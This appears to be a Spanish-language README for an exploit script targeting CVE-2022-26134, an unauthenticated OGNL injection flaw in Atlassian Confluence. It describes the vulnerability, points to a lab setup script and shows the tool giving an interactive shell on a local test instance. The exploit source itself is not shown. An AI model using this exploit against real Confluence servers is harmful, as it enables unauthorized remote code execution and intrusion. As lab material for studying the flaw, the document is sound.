
Exploit para CVE-2022-26134: Ejecución remota de código sin autenticación en Confluence mediante inyección OGNL
Otro exploit en la tierra de OGNL
Confluence es una wiki corporativa basada en web desarrollada por la empresa de software australiana Atlassian.
El 2 de junio de 2022, Atlassian publicó un aviso de seguridad para sus aplicaciones Confluence Server y Data Center, destacando una vulnerabilidad de ejecución remota de código no autenticada de severidad crítica. La vulnerabilidad de inyección OGNL permite a un usuario no autenticado ejecutar código arbitrario en una instancia de Confluence Server o Data Center.
Para configurar tu laboratorio, ejecuta start_conflunce.sh y sigue las instrucciones proporcionadas aquí.
$ ./confluence-exploit.py
usage: confluence-exploit.py [-h] -u URL
confluence-exploit.py: error: the following arguments are required: -u/--url
$ ./confluence-exploit.py -u http://127.0.0.1:8090
🔗 URL: http://127.0.0.1:8090
👉 (id): whoami
confluence